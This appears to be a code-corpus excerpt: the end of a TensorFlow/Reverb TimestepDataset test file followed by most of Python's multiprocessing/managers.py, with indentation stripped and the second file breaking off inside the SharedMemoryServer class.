f'Server at {address} does not contain any table named not_found. '
f'Found: table_a, table_b, table_c.'):
timestep_dataset.TimestepDataset.from_table_signature(
address, 'not_found', 100)
def test_server_not_found(self):
with self.assertRaises(errors.DeadlineExceededError):
timestep_dataset.TimestepDataset.from_table_signature(
'localhost:1234', 'not_found', 100, get_signature_timeout_secs=1)
def test_table_does_not_have_signature(self):
server = make_server()
address = f'localhost:{server.port}'
with self.assertRaisesWithPredicateMatch(
ValueError, f'Table dist at {address} does not have a signature.'):
timestep_dataset.TimestepDataset.from_table_signature(
address, 'dist', 100)
def test_sets_dtypes_from_signature(self):
signature = {
'a': {
'b': tf.TensorSpec([3, 3], tf.float32),
'c': tf.TensorSpec([], tf.int64),
},
'x': tf.TensorSpec([None], tf.uint64),
}
server = reverb_server.Server(
[reverb_server.Table.queue('queue', 10, signature=signature)])
dataset = timestep_dataset.TimestepDataset.from_table_signature(
f'localhost:{server.port}', 'queue', 100)
self.assertDictEqual(dataset.element_spec.data, signature)
def test_sets_dtypes_from_bounded_spec_signature(self):
bounded_spec_signature = {
'a': {
'b': tensor_spec.BoundedTensorSpec([3, 3], tf.float32, 0, 3),
'c': tensor_spec.BoundedTensorSpec([], tf.int64, 0, 5),
},
}
server = reverb_server.Server([
reverb_server.Table.queue(
'queue', 10, signature=bounded_spec_signature)
])
dataset = timestep_dataset.TimestepDataset.from_table_signature(
f'localhost:{server.port}', 'queue', 100)
self.assertDictEqual(
dataset.element_spec.data, {
'a': {
'b': tf.TensorSpec([3, 3], tf.float32),
'c': tf.TensorSpec([], tf.int64),
},
})
if __name__ == '__main__':
tf.disable_eager_execution()
tf.test.main()
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token',
'SharedMemoryManager' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError as second_ke:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception as e:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(*args, **kwds):
'''
Create a new shared object and return its id
'''
if len(args) >= 3:
self, c, typeid, *args = args
elif not args:
raise TypeError("descriptor 'create' of 'Server' object "
"needs an argument")
else:
if 'typeid' not in kwds:
raise TypeError('create expected at least 2 positional '
'arguments, got %d' % (len(args)-1))
typeid = kwds.pop('typeid')
if len(args) >= 2:
self, c, *args = args
import warnings
warnings.warn("Passing 'typeid' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
else:
if 'c' not in kwds:
raise TypeError('create expected at least 2 positional '
'arguments, got %d' % (len(args)-1))
c = kwds.pop('c')
self, *args = args
import warnings
warnings.warn("Passing 'c' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
args = tuple(args)
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
create.__text_signature__ = '($self, c, typeid, /, *args, **kwds)'
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = { #XXX: register dill?
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = getattr(time,'monotonic',time.time)() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - getattr(time,'monotonic',time.time)()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocess.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
